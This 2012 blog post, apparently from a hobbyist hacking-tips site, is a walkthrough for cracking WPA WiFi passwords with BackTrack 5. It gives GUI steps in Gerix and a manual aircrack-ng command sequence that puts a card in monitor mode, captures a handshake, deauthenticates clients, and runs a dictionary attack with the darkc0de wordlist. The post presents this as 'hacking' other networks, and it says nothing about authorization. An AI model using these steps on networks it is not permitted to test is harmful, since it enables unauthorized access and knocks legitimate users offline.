Hello friends, I have written a mini book on Cyber Security awareness for you, named "Hacking into Hackers' Head". This book uses common terms to explain things, and I'm sure you will get benefitted from it in your day to day life. It's available on Kindle and Google Play. Grab your copy now.

Saturday, July 28, 2012

Hack wifi using backtrack 5

Hi friends today I am going to tell you how to hack wifi wpa security. I am using the backtrack5 operating system to hack wifi. In my recent recent posts I told you how to install backtrack5 r1 operating system in dual boot that is in conjuction with windows OS. In bt5 there is an application gerix wifi cracker-ng which is used to hack wifi. I will show you both GUI version and manual steps (command based).


HEre is GUI steps:-

go to applications> exploitation tools> wireless exploitation> wlan exploitation> gerix-wifi-cracker-ng.



In Gerix:-
Configure: go to configuration
1) set card to monitor mode. Highlight Monitor Mode, then. 
2) rescan networks.  (hightlight networks) 
3) Highlight Network, and monitor card, clean old session,  now goto WPA tab.
4) in wpa tab,  click 1st start sniffing. 
    #Auto Load victim 
    #Client deAuthentication 
5) now go to cracking tab. click on WPA bruteforce cracking.
6) in normal cracking, add the path of dictionary as in given below.
7) Run the crack on the test file, put your password in the list to test.

Once you get the handshake goto crack wpa, and select your dictionary file in, normal cracking. 
File location /darkc0de.lst
root@bt:/pentest/passwords/wordlists# pwd
/pentest/passwords/wordlists/darkc0de.lst      here  o in darkc0de is a zero not O.
then press aircrack-ng crack WPA password button... 
cracking is start.........


Here is Manual Steps for doing the all process of gerix-cracker. 

Steps:

1)airmon-ng 
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -0 5 -a (bssid) mon0
6)aircrack-ng (filename)*.cap -w (dictionary location)



NOTE: I am using default dictionary of bt5 and cracking is done according to the dictionary. This dictionary can only break alphanumeric passwords. For better  results, download more efficient dictionaries....

Keep visiting for more tips n tricks n njoy hacking......

No comments:

Post a Comment

We appreciate your valuable comments.

Scroll to Top